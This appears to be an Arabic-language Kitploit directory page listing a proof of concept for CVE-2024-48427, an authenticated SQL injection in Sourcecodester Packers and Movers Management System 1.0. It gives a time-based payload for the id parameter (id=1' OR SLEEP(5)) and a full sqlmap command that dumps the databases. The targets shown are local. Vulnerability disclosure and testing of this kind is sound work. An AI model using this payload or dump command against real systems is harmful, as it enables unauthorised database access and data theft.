Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-48427 — إثبات المفهوم لـ CVE-2024-48427: حقن SQL في Sourcecodester Packers and Movers Management System v1.0. يستغل معلمة id لتنفيذ أوامر SQL عشوائية وتفريغ محتويات قاعدة البيانات. | Kitploit
أدوات/GitHubGitHub/vighneshnair7/cve-2024-48427
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubvighneshnair7/cve-2024-48427

CVE-2024-48427

إثبات المفهوم لـ CVE-2024-48427: حقن SQL في Sourcecodester Packers and Movers Management System v1.0. يستغل معلمة id لتنفيذ أوامر SQL عشوائية وتفريغ محتويات قاعدة البيانات.

عرض المستودع
112منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-48427

الوصف

ثغرة حقن SQL في Packers and Movers Management System من Sourcecodester الإصدار 1.0 تسمح للمستخدمين المصادق عليهم عن بُعد بتنفيذ أوامر SQL عشوائية عبر معامل id في /mpms/admin/?page=services/manage_service&id

نوع الثغرة

SQL Injection

بائع المنتج

Sourcecodester

قاعدة كود المنتج المتأثر:

https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

المكوّن المتأثر:

معامل id الخاص بتحديث تفاصيل الخدمة في /mpms/admin/?page=services/manage_service&id

نواقل الهجوم:

  1. قم بإعداد التطبيق محليًا وسجّل الدخول إلى لوحة الإدارة باستخدام بيانات الاعتماد الافتراضية المتوفرة.
  2. انتقل إلى الصفحة المعرضة للخطر: http://localhost/mpms/admin/?page=services/manage_service&id=2
  • احقن حمولة SQL في معامل id: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
  • راقب استجابة التطبيق: يجب أن تستغرق الصفحة وقتًا أطول بشكل ملحوظ (5 ثوانٍ) للتحميل إذا كان الحقن ناجحًا، مما يؤكد أن معامل id معرض لحقن SQL.
  • الآن قم بتشغيل أداة SQLMap لتفريغ تفاصيل قاعدة البيانات:
  • sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump
  • المراجع:

    1. https://owasp.org/www-community/attacks/SQL_Injection
    2. https://portswigger.net/web-security/sql-injection
    تنزيل الأداة